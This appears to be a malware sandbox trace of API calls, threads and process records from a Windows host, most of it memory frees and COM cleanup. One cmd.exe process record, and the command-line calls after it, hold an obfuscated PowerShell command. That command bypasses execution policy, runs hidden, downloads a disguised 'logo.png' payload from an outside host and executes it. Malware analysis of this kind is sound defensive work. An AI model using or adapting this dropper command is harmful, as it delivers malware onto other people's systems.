	[0098.514] free (_Block=0x516cc0) 
	[0098.514] ??3@YAXPEAX@Z () returned 0x1b00910001
	[0098.514] ??3@YAXPEAX@Z () returned 0x500480001
	[0098.514] free (_Block=0x50a410) 
	[0098.514] ??3@YAXPEAX@Z () returned 0xe8003a0001
	[0098.514] free (_Block=0x4de3c0) 
	[0098.514] free (_Block=0x4cb680) 
	[0098.514] free (_Block=0x465fe0) 
	[0098.514] ??3@YAXPEAX@Z () returned 0x4800a70001
	[0098.514] ??3@YAXPEAX@Z () returned 0x2c01820001
	[0098.514] free (_Block=0x4de330) 
	[0098.514] free (_Block=0x4ce3e0) 
	[0098.514] free (_Block=0x465ed0) 
	[0098.514] ??3@YAXPEAX@Z () returned 0x49009c0001
	[0098.514] ??3@YAXPEAX@Z () returned 0x6e006f4900cd0001
	[0098.515] free (_Block=0x524b50) 
	[0098.515] free (_Block=0x5055e0) 
	[0098.515] free (_Block=0x516aa0) 
	[0098.515] ??3@YAXPEAX@Z () returned 0x1c00860001
	[0098.515] ??3@YAXPEAX@Z () returned 0x1a00b80001
	[0098.515] free (_Block=0x50a110) 
	[0098.515] free (_Block=0x4de210) 
	[0098.515] free (_Block=0x465cb0) 
	[0098.515] ??3@YAXPEAX@Z () returned 0x4a00860001
	[0098.515] ??3@YAXPEAX@Z () returned 0xe9002c0001
	[0098.515] free (_Block=0x524b10) 
	[0098.515] ??3@YAXPEAX@Z () returned 0x1b009c0001
	[0098.515] free (_Block=0x505550) 
	[0098.515] free (_Block=0x500c30) 
	[0098.515] free (_Block=0x516990) 
	[0098.515] ??3@YAXPEAX@Z () returned 0x1d00700001
	[0098.515] ??3@YAXPEAX@Z () returned 0x2d006a0001
	[0098.515] free (_Block=0x5054c0) 
	[0098.515] free (_Block=0x500e40) 
	[0098.515] free (_Block=0x516880) 
	[0098.515] ??3@YAXPEAX@Z () returned 0x1e00650001
	[0098.516] ??3@YAXPEAX@Z () returned 0x600410001
	[0098.516] free (_Block=0x50a0d0) 
	[0098.516] ??3@YAXPEAX@Z () returned 0xea00100001
	[0098.516] free (_Block=0x4de180) 
	[0098.516] free (_Block=0x4ce1d0) 
	[0098.516] free (_Block=0x465ba0) 
	[0098.516] ??3@YAXPEAX@Z () returned 0x4b00700001
	[0098.516] ??3@YAXPEAX@Z () returned 0x2e017a0001
	[0098.516] free (_Block=0x524ad0) 
	[0098.516] free (_Block=0x5053a0) 
	[0098.516] free (_Block=0x516660) 
	[0098.516] ??3@YAXPEAX@Z () returned 0x1f005a0001
	[0098.516] ??3@YAXPEAX@Z () returned 0x1c008e0001
	[0098.516] free (_Block=0x4de0f0) 
	[0098.516] free (_Block=0x4cdfc0) 
	[0098.516] free (_Block=0x465a90) 
	[0098.516] ??3@YAXPEAX@Z () returned 0x4c005a0001
	[0098.516] ??3@YAXPEAX@Z () returned 0x6e006f4a00410001
	[0098.516] free (_Block=0x50a090) 
	[0098.516] free (_Block=0x46c550) 
	[0098.516] free (_Block=0x465870) 
	[0098.516] ??3@YAXPEAX@Z () returned 0x4d004f0001
	[0098.517] ??3@YAXPEAX@Z () returned 0x1
	[0098.517] free (_Block=0x524a90) 
	[0098.517] ??3@YAXPEAX@Z () returned 0x1d00720001
	[0098.517] free (_Block=0x505310) 
	[0098.517] free (_Block=0x500810) 
	[0098.517] free (_Block=0x516550) 
	[0098.517] ??3@YAXPEAX@Z () returned 0x2000440001
	[0098.517] ??3@YAXPEAX@Z () returned 0x2f00620001
	[0098.517] free (_Block=0x505280) 
	[0098.517] free (_Block=0x500a20) 
	[0098.517] free (_Block=0x516440) 
	[0098.517] ??3@YAXPEAX@Z () returned 0x2100390001
	[0098.517] ??3@YAXPEAX@Z () returned 0x7003a0001
	[0098.517] free (_Block=0x50a050) 
	[0098.517] ??3@YAXPEAX@Z () returned 0x19001de0001
	[0098.517] free (_Block=0x46bbc0) 
	[0098.517] free (_Block=0x4cddb0) 
	[0098.517] free (_Block=0x465760) 
	[0098.517] ??3@YAXPEAX@Z () returned 0x4e002e0001
	[0098.517] ??3@YAXPEAX@Z () returned 0x3001720001
	[0098.517] free (_Block=0x46bc50) 
	[0098.517] free (_Block=0x4cdba0) 
	[0098.518] free (_Block=0x465650) 
	[0098.518] ??3@YAXPEAX@Z () returned 0x4f00230001
	[0098.518] ??3@YAXPEAX@Z () returned 0x6e006f4b003a0001
	[0098.518] free (_Block=0x524a50) 
	[0098.518] free (_Block=0x505160) 
	[0098.518] free (_Block=0x516220) 
	[0098.518] ??3@YAXPEAX@Z () returned 0x22002e0001
	[0098.518] ??3@YAXPEAX@Z () returned 0x1e00640001
	[0098.518] free (_Block=0x50a010) 
	[0098.518] free (_Block=0x46c5e0) 
	[0098.518] free (_Block=0x465430) 
	[0098.518] ??3@YAXPEAX@Z () returned 0x5000180001
	[0098.518] ??3@YAXPEAX@Z () returned 0x19101d00001
	[0098.518] free (_Block=0x524a10) 
	[0098.518] ??3@YAXPEAX@Z () returned 0x1f00480001
	[0098.518] free (_Block=0x5050d0) 
	[0098.518] free (_Block=0x5003f0) 
	[0098.518] free (_Block=0x516110) 
	[0098.518] ??3@YAXPEAX@Z () returned 0x2300180001
	[0098.518] ??3@YAXPEAX@Z () returned 0x31005a0001
	[0098.519] free (_Block=0x505040) 
	[0098.519] free (_Block=0x500600) 
	[0098.519] free (_Block=0x516000) 
	[0098.519] ??3@YAXPEAX@Z () returned 0x24000d0001
	[0098.519] ??3@YAXPEAX@Z () returned 0x800330001
	[0098.519] free (_Block=0x509fd0) 
	[0098.519] ??3@YAXPEAX@Z () returned 0x19201b40001
	[0098.519] free (_Block=0x46baa0) 
	[0098.519] free (_Block=0x4cd990) 
	[0098.519] free (_Block=0x465320) 
	[0098.519] ??3@YAXPEAX@Z () returned 0x5101c50001
	[0098.519] ??3@YAXPEAX@Z () returned 0x32016a0001
	[0098.519] free (_Block=0x46b980) 
	[0098.519] free (_Block=0x4cd780) 
	[0098.519] free (_Block=0x465210) 
	[0098.519] ??3@YAXPEAX@Z () returned 0x5201ba0001
	[0098.519] ??3@YAXPEAX@Z () returned 0x6e006f4c00c60001
	[0098.519] free (_Block=0x5249d0) 
	[0098.519] free (_Block=0x504f20) 
	[0098.519] free (_Block=0x4fdae0) 
	[0098.519] ??3@YAXPEAX@Z () returned 0x1
	[0098.519] ??3@YAXPEAX@Z () returned 0x20003a0001
	[0098.519] ??3@YAXPEAX@Z () returned 0x2b002e0001
	[0098.520] free (_Block=0x509f90) 
	[0098.520] free (_Block=0x46d5a0) 
	[0098.520] free (_Block=0x464ff0) 
	[0098.520] ??3@YAXPEAX@Z () returned 0x5301af0001
	[0098.520] ??3@YAXPEAX@Z () returned 0x19301a60001
	[0098.520] free (_Block=0x524990) 
	[0098.520] ??3@YAXPEAX@Z () returned 0x21001e0001
	[0098.520] free (_Block=0x504e90) 
	[0098.520] free (_Block=0x4fffd0) 
	[0098.520] free (_Block=0x4fd9d0) 
	[0098.520] ??3@YAXPEAX@Z () returned 0x2f00c80001
	[0098.520] ??3@YAXPEAX@Z () returned 0x33000a0001
	[0098.520] free (_Block=0x504e00) 
	[0098.520] free (_Block=0x5001e0) 
	[0098.520] free (_Block=0x4fd8c0) 
	[0098.520] ??3@YAXPEAX@Z () returned 0x30009c0001
	[0098.520] ??3@YAXPEAX@Z () returned 0x9002c0001
	[0098.520] free (_Block=0x524950) 
	[0098.520] free (_Block=0x504ce0) 
	[0098.520] free (_Block=0x4fd6a0) 
	[0098.520] ??3@YAXPEAX@Z () returned 0x3100700001
	[0098.520] ??3@YAXPEAX@Z () returned 0x194018a0001
	[0098.521] free (_Block=0x509f50) 
	[0098.521] ??3@YAXPEAX@Z () returned 0x19501ec0001
	[0098.521] free (_Block=0x46d510) 
	[0098.521] free (_Block=0x4cd570) 
	[0098.521] free (_Block=0x464ee0) 
	[0098.521] ??3@YAXPEAX@Z () returned 0x5401990001
	[0098.521] ??3@YAXPEAX@Z () returned 0x3401620001
	[0098.521] free (_Block=0x46d3f0) 
	[0098.521] free (_Block=0x4cd360) 
	[0098.521] free (_Block=0x464dd0) 
	[0098.521] ??3@YAXPEAX@Z () returned 0x55018e0001
	[0098.521] ??3@YAXPEAX@Z () returned 0x6e006f4d00020001
	[0098.521] free (_Block=0x509f10) 
	[0098.521] free (_Block=0x46d360) 
	[0098.521] free (_Block=0x464bb0) 
	[0098.521] ??3@YAXPEAX@Z () returned 0x5601830001
	[0098.521] ??3@YAXPEAX@Z () returned 0x196017c0001
	[0098.521] free (_Block=0x524910) 
	[0098.521] ??3@YAXPEAX@Z () returned 0x19701600001
	[0098.521] free (_Block=0x504c50) 
	[0098.521] free (_Block=0x4ffbb0) 
	[0098.521] free (_Block=0x4fd590) 
	[0098.521] ??3@YAXPEAX@Z () returned 0x1
	[0098.522] ??3@YAXPEAX@Z () returned 0x3500520001
	[0098.522] free (_Block=0x504bc0) 
	[0098.522] free (_Block=0x4ffdc0) 
	[0098.522] free (_Block=0x4fd480) 
	[0098.522] ??3@YAXPEAX@Z () returned 0x1201f10001
	[0098.522] ??3@YAXPEAX@Z () returned 0xa00250001
	[0098.522] free (_Block=0x509ed0) 
	[0098.522] ??3@YAXPEAX@Z () returned 0x198016e0001
	[0098.522] free (_Block=0x46bb30) 
	[0098.522] free (_Block=0x4caa20) 
	[0098.522] free (_Block=0x464aa0) 
	[0098.522] ??3@YAXPEAX@Z () returned 0x57016d0001
	[0098.522] ??3@YAXPEAX@Z () returned 0x36015a0001
	[0098.522] free (_Block=0x5248d0) 
	[0098.522] free (_Block=0x504aa0) 
	[0098.522] free (_Block=0x4fd260) 
	[0098.522] ??3@YAXPEAX@Z () returned 0x1301e60001
	[0098.522] ??3@YAXPEAX@Z () returned 0x1
	[0098.522] free (_Block=0x525290) 
	[0098.522] ??3@YAXPEAX@Z () returned 0x19901520001
	[0098.523] free (_Block=0x46be00) 
	[0098.523] free (_Block=0x4cb890) 
	[0098.523] free (_Block=0x464990) 
	[0098.523] ??3@YAXPEAX@Z () returned 0x5801620001
	[0098.527] CGIPTable::RevokeInterfaceFromGlobal () returned 0x0
	[0098.527] IUnknown:Release (This=0x20f420) returned 0x1
	[0098.527] ??3@YAXPEAX@Z () returned 0x7c35f001
	[0098.527] IUnknown:Release (This=0x20f420) returned 0x0
	[0098.527] CDebugEventFire::EndSession () returned 0x0
	[0098.527] CDebugEventFire::Release () returned 0x1
	[0098.529] CDebugEventFire::Release () returned 0x0
	[0098.530] PostMessageA (hWnd=0x3023c, Msg=0x12, wParam=0x0, lParam=0x0) returned 1
	[0098.532] MsgWaitForMultipleObjects (nCount=0x1, pHandles=0x19f750*=0xd4, fWaitAll=0, dwMilliseconds=0xffffffff, dwWakeMask=0xff) returned 0x0
	[0098.532] CloseHandle (hObject=0xd4) returned 1
	[0098.532] ??3@YAXPEAX@Z () returned 0x7c35f001
	[0098.534] CoRegisterMessageFilter (in: lpMessageFilter=0x0, lplpMessageFilter=0x19f780 | out: lplpMessageFilter=0x19f780*=0x425f80) returned 0x0
	[0098.534] ??3@YAXPEAX@Z () returned 0x7c35f001
	[0098.534] ??3@YAXPEAX@Z () returned 0x7c35f001
	[0098.534] ??3@YAXPEAX@Z () returned 0x7c35f001
	[0098.534] CoUninitialize () 
	[0098.534] DllCanUnloadNow () returned 0x0
	[0098.534] DllCanUnloadNow () returned 0x0
	[0098.535] DllCanUnloadNow () returned 0x1
	[0098.536] free (_Block=0x4e1860) 

Thread:
	id = 233
	os_tid = 0x364


Thread:
	id = 234
	os_tid = 0x110

	[0095.272] GetClassInfoA (in: hInstance=0xff6b0000, lpClassName="WSH-Timer", lpWndClass=0x232f9e0 | out: lpWndClass=0x232f9e0) returned 0
	[0095.784] RegisterClassA (lpWndClass=0x232f9e0) returned 0x9006ac138
	[0095.784] CreateWindowExA (dwExStyle=0x0, lpClassName="WSH-Timer", lpWindowName=0x0, dwStyle=0x0, X=0, Y=0, nWidth=1, nHeight=1, hWndParent=0x0, hMenu=0x0, hInstance=0xff6b0000, lpParam=0x425a60) returned 0x3023c
	[0095.785] GetWindowLongPtrA (hWnd=0x3023c, nIndex=-21) returned 0x0
	[0095.785] NtdllDefWindowProc_A (hWnd=0x3023c, Msg=0x24, wParam=0x0, lParam=0x232f3d0) returned 0x0
	[0095.785] GetWindowLongPtrA (hWnd=0x3023c, nIndex=-21) returned 0x0
	[0095.785] SetWindowLongPtrA (hWnd=0x3023c, nIndex=-21, dwNewLong=0x425a60) returned 0x0
	[0095.785] NtdllDefWindowProc_A (hWnd=0x3023c, Msg=0x81, wParam=0x0, lParam=0x232f390) returned 0x1
	[0095.787] GetWindowLongPtrA (hWnd=0x3023c, nIndex=-21) returned 0x425a60
	[0095.787] NtdllDefWindowProc_A (hWnd=0x3023c, Msg=0x83, wParam=0x0, lParam=0x232f3f0) returned 0x0
	[0095.789] GetWindowLongPtrA (hWnd=0x3023c, nIndex=-21) returned 0x425a60
	[0095.789] NtdllDefWindowProc_A (hWnd=0x3023c, Msg=0x1, wParam=0x0, lParam=0x232f390) returned 0x0
	[0095.789] SetEvent (hEvent=0xcc) returned 1
	[0095.831] GetMessageA (in: lpMsg=0x232f9b0, hWnd=0x3023c, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x232f9b0) returned 0
	[0098.529] GetWindowLongPtrA (hWnd=0x3023c, nIndex=-21) returned 0x425a60
	[0098.530] GetWindowLongPtrA (hWnd=0x3023c, nIndex=-21) returned 0x425a60

Thread:
	id = 237
	os_tid = 0x858


Thread:
	id = 238
	os_tid = 0x77c


Thread:
	id = 241
	os_tid = 0xb84


Thread:
	id = 243
	os_tid = 0x884


Thread:
	id = 244
	os_tid = 0xa04


Thread:
	id = 249
	os_tid = 0xb0c


Thread:
	id = 253
	os_tid = 0x184


Process:
	id = "29"
	image_name = "cmd.exe"
	filename = "c:\\windows\\system32\\cmd.exe"
	page_root = "0x4f8ab000"
	os_pid = "0x828"
	os_integrity_level = "0x2000"
	os_privileges = "0x800000"
	monitor_reason = "child_process"
	parent_id = "25"
	os_parent_pid = "0x154"
	cmd_line = "\"C:\\Windows\\System32\\cmd.exe\" /c WNjKdpGDFcPRHnV & Po^wEr^sh^elL.e^Xe -executionpolicy bypass -noprofile -w hidden $v1='Net.W'; $v2='ebClient'; $var = (New-Object $v1$v2); $var.Headers['User-Agent'] = 'Google Chrome'; $var.downloadfile('http://larixparcels.com/logo.png','%temp%xeE84.png'); & %temp%xeE84.png & VsDANZWTyXBdJcu"
	cur_dir = "C:\\Users\\aETAdzjz\\Documents\\"
	os_username = "YKYD69Q\\aETAdzjz"
	bitness = "64"
	os_groups = "YKYD69Q\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e8ca" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]


Thread:
	id = 232
	os_tid = 0x610

	[0096.398] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x24fa80 | out: lpSystemTimeAsFileTime=0x24fa80*(dwLowDateTime=0xb1c88500, dwHighDateTime=0x1d543d1)) 
	[0096.398] GetCurrentProcessId () returned 0x828
	[0096.398] GetCurrentThreadId () returned 0x610
	[0096.398] GetTickCount () returned 0x28a54
	[0096.398] QueryPerformanceCounter (in: lpPerformanceCount=0x24fa88 | out: lpPerformanceCount=0x24fa88*=22082414949) returned 1
	[0096.399] GetModuleHandleW (lpModuleName=0x0) returned 0x4ac50000
	[0096.399] __set_app_type (_Type=0x1) 
	[0096.399] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4ac77810) returned 0x0
	[0096.400] __getmainargs (in: _Argc=0x4ac9a608, _Argv=0x4ac9a618, _Env=0x4ac9a610, _DoWildCard=0, _StartInfo=0x4ac7e0f4 | out: _Argc=0x4ac9a608, _Argv=0x4ac9a618, _Env=0x4ac9a610) returned 0
	[0096.400] GetCurrentThreadId () returned 0x610
	[0096.400] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x610) returned 0x3c
	[0096.400] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x77040000
	[0096.400] GetProcAddress (hModule=0x77040000, lpProcName="SetThreadUILanguage") returned 0x77056d40
	[0096.400] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409
	[0096.401] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1
	[0096.401] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x24fa18 | out: phkResult=0x24fa18*=0x0) returned 0x2
	[0096.401] VirtualQuery (in: lpAddress=0x24fa00, lpBuffer=0x24f980, dwLength=0x30 | out: lpBuffer=0x24f980*(BaseAddress=0x24f000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0096.401] VirtualQuery (in: lpAddress=0x150000, lpBuffer=0x24f980, dwLength=0x30 | out: lpBuffer=0x24f980*(BaseAddress=0x150000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0096.401] VirtualQuery (in: lpAddress=0x151000, lpBuffer=0x24f980, dwLength=0x30 | out: lpBuffer=0x24f980*(BaseAddress=0x151000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x3000, State=0x1000, Protect=0x104, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0096.401] VirtualQuery (in: lpAddress=0x154000, lpBuffer=0x24f980, dwLength=0x30 | out: lpBuffer=0x24f980*(BaseAddress=0x154000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0xfc000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0096.401] VirtualQuery (in: lpAddress=0x250000, lpBuffer=0x24f980, dwLength=0x30 | out: lpBuffer=0x24f980*(BaseAddress=0x250000, AllocationBase=0x0, AllocationProtect=0x0, __alignment1=0x0, RegionSize=0xf0000, State=0x10000, Protect=0x1, Type=0x0, __alignment2=0x0)) returned 0x30
	[0096.401] GetConsoleOutputCP () returned 0x1b5
	[0096.401] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4ac8bfe0 | out: lpCPInfo=0x4ac8bfe0) returned 1
	[0096.401] SetConsoleCtrlHandler (HandlerRoutine=0x4ac73184, Add=1) returned 1
	[0096.401] _get_osfhandle (_FileHandle=1) returned 0x7
	[0096.401] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1
	[0096.402] _get_osfhandle (_FileHandle=1) returned 0x7
	[0096.402] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4ac7e194 | out: lpMode=0x4ac7e194) returned 1
	[0096.402] _get_osfhandle (_FileHandle=1) returned 0x7
	[0096.402] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1
	[0096.402] _get_osfhandle (_FileHandle=0) returned 0x3
	[0096.402] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4ac7e198 | out: lpMode=0x4ac7e198) returned 1
	[0096.402] _get_osfhandle (_FileHandle=0) returned 0x3
	[0096.402] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1
	[0096.403] GetEnvironmentStringsW () returned 0x358f20*
	[0096.403] GetProcessHeap () returned 0x340000
	[0096.403] RtlAllocateHeap (HeapHandle=0x340000, Flags=0x8, Size=0xad4) returned 0x359a00
	[0096.403] FreeEnvironmentStringsW (penv=0x358f20) returned 1
	[0096.403] GetProcessHeap () returned 0x340000
	[0096.403] RtlAllocateHeap (HeapHandle=0x340000, Flags=0x8, Size=0x8) returned 0x3587a0
	[0096.403] GetEnvironmentStringsW () returned 0x358f20*
	[0096.403] GetProcessHeap () returned 0x340000
	[0096.403] RtlAllocateHeap (HeapHandle=0x340000, Flags=0x8, Size=0xad4) returned 0x35a4e0
	[0096.403] FreeEnvironmentStringsW (penv=0x358f20) returned 1
	[0096.403] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x24e8d8 | out: phkResult=0x24e8d8*=0x44) returned 0x0
	[0096.403] RegQueryValueExW (in: hKey=0x44, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x24e8d0, lpData=0x24e8f0, lpcbData=0x24e8d4*=0x1000 | out: lpType=0x24e8d0*=0x0, lpData=0x24e8f0*=0x18, lpcbData=0x24e8d4*=0x1000) returned 0x2
	[0096.403] RegQueryValueExW (in: hKey=0x44, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x24e8d0, lpData=0x24e8f0, lpcbData=0x24e8d4*=0x1000 | out: lpType=0x24e8d0*=0x4, lpData=0x24e8f0*=0x1, lpcbData=0x24e8d4*=0x4) returned 0x0
	[0096.403] RegQueryValueExW (in: hKey=0x44, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x24e8d0, lpData=0x24e8f0, lpcbData=0x24e8d4*=0x1000 | out: lpType=0x24e8d0*=0x0, lpData=0x24e8f0*=0x1, lpcbData=0x24e8d4*=0x1000) returned 0x2
	[0096.403] RegQueryValueExW (in: hKey=0x44, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x24e8d0, lpData=0x24e8f0, lpcbData=0x24e8d4*=0x1000 | out: lpType=0x24e8d0*=0x4, lpData=0x24e8f0*=0x0, lpcbData=0x24e8d4*=0x4) returned 0x0
	[0096.403] RegQueryValueExW (in: hKey=0x44, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x24e8d0, lpData=0x24e8f0, lpcbData=0x24e8d4*=0x1000 | out: lpType=0x24e8d0*=0x4, lpData=0x24e8f0*=0x40, lpcbData=0x24e8d4*=0x4) returned 0x0
	[0096.403] RegQueryValueExW (in: hKey=0x44, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x24e8d0, lpData=0x24e8f0, lpcbData=0x24e8d4*=0x1000 | out: lpType=0x24e8d0*=0x4, lpData=0x24e8f0*=0x40, lpcbData=0x24e8d4*=0x4) returned 0x0
	[0096.403] RegQueryValueExW (in: hKey=0x44, lpValueName="AutoRun", lpReserved=0x0, lpType=0x24e8d0, lpData=0x24e8f0, lpcbData=0x24e8d4*=0x1000 | out: lpType=0x24e8d0*=0x0, lpData=0x24e8f0*=0x40, lpcbData=0x24e8d4*=0x1000) returned 0x2
	[0096.404] RegCloseKey (hKey=0x44) returned 0x0
	[0096.404] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x24e8d8 | out: phkResult=0x24e8d8*=0x44) returned 0x0
	[0096.404] RegQueryValueExW (in: hKey=0x44, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x24e8d0, lpData=0x24e8f0, lpcbData=0x24e8d4*=0x1000 | out: lpType=0x24e8d0*=0x0, lpData=0x24e8f0*=0x40, lpcbData=0x24e8d4*=0x1000) returned 0x2
	[0096.404] RegQueryValueExW (in: hKey=0x44, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x24e8d0, lpData=0x24e8f0, lpcbData=0x24e8d4*=0x1000 | out: lpType=0x24e8d0*=0x4, lpData=0x24e8f0*=0x1, lpcbData=0x24e8d4*=0x4) returned 0x0
	[0096.404] RegQueryValueExW (in: hKey=0x44, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x24e8d0, lpData=0x24e8f0, lpcbData=0x24e8d4*=0x1000 | out: lpType=0x24e8d0*=0x0, lpData=0x24e8f0*=0x1, lpcbData=0x24e8d4*=0x1000) returned 0x2
	[0096.404] RegQueryValueExW (in: hKey=0x44, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x24e8d0, lpData=0x24e8f0, lpcbData=0x24e8d4*=0x1000 | out: lpType=0x24e8d0*=0x4, lpData=0x24e8f0*=0x0, lpcbData=0x24e8d4*=0x4) returned 0x0
	[0096.404] RegQueryValueExW (in: hKey=0x44, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x24e8d0, lpData=0x24e8f0, lpcbData=0x24e8d4*=0x1000 | out: lpType=0x24e8d0*=0x4, lpData=0x24e8f0*=0x9, lpcbData=0x24e8d4*=0x4) returned 0x0
	[0096.404] RegQueryValueExW (in: hKey=0x44, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x24e8d0, lpData=0x24e8f0, lpcbData=0x24e8d4*=0x1000 | out: lpType=0x24e8d0*=0x4, lpData=0x24e8f0*=0x9, lpcbData=0x24e8d4*=0x4) returned 0x0
	[0096.404] RegQueryValueExW (in: hKey=0x44, lpValueName="AutoRun", lpReserved=0x0, lpType=0x24e8d0, lpData=0x24e8f0, lpcbData=0x24e8d4*=0x1000 | out: lpType=0x24e8d0*=0x0, lpData=0x24e8f0*=0x9, lpcbData=0x24e8d4*=0x1000) returned 0x2
	[0096.404] RegCloseKey (hKey=0x44) returned 0x0
	[0096.404] time (in: timer=0x0 | out: timer=0x0) returned 0x5d3b2e6e
	[0096.404] srand (_Seed=0x5d3b2e6e) 
	[0096.404] GetCommandLineW () returned="\"C:\\Windows\\System32\\cmd.exe\" /c WNjKdpGDFcPRHnV & Po^wEr^sh^elL.e^Xe -executionpolicy bypass -noprofile -w hidden $v1='Net.W'; $v2='ebClient'; $var = (New-Object $v1$v2); $var.Headers['User-Agent'] = 'Google Chrome'; $var.downloadfile('http://larixparcels.com/logo.png','%temp%xeE84.png'); & %temp%xeE84.png & VsDANZWTyXBdJcu"
	[0096.404] GetCommandLineW () returned="\"C:\\Windows\\System32\\cmd.exe\" /c WNjKdpGDFcPRHnV & Po^wEr^sh^elL.e^Xe -executionpolicy bypass -noprofile -w hidden $v1='Net.W'; $v2='ebClient'; $var = (New-Object $v1$v2); $var.Headers['User-Agent'] = 'Google Chrome'; $var.downloadfile('http://larixparcels.com/logo.png','%temp%xeE84.png'); & %temp%xeE84.png & VsDANZWTyXBdJcu"
	[0096.404] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4ac8c0a0 | out: lpBuffer="C:\\Users\\aETAdzjz\\Documents") returned 0x1b
	[0096.404] GetProcessHeap () returned 0x340000
	[0096.404] RtlAllocateHeap (HeapHandle=0x340000, Flags=0x8, Size=0x218) returned 0x358f20
	[0096.404] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x358f30, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b
	[0096.405] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4ac7f360, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\;C:\\Program Files\\Microsoft Office\\root\\Client") returned 0x91
	[0096.405] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4ac7f360, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35
	[0096.405] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4ac7f360, nSize=0x2000 | out: lpBuffer="") returned 0x0
	[0096.405] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13
	[0096.405] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11
	[0096.405] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13
	[0096.405] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13
	[0096.405] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12
	[0096.405] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4
	[0096.405] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2
	[0096.405] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8
	[0096.405] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1
	[0096.405] GetProcessHeap () returned 0x340000
	[0096.405] HeapFree (in: hHeap=0x340000, dwFlags=0x0, lpMem=0x359a00 | out: hHeap=0x340000) returned 1
	[0096.405] GetEnvironmentStringsW () returned 0x359140*
	[0096.405] GetProcessHeap () returned 0x340000
	[0096.405] RtlAllocateHeap (HeapHandle=0x340000, Flags=0x8, Size=0xaec) returned 0x35bad0
	[0096.405] FreeEnvironmentStringsW (penv=0x359140) returned 1
	[0096.405] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4ac7f360, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b
	[0096.405] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4ac7f360, nSize=0x2000 | out: lpBuffer="") returned 0x0
	[0096.405] _wcsicmp (_String1="KEYS", _String2="CD") returned 8
	[0096.405] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6
	[0096.405] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8
	[0096.405] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8
	[0096.406] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7
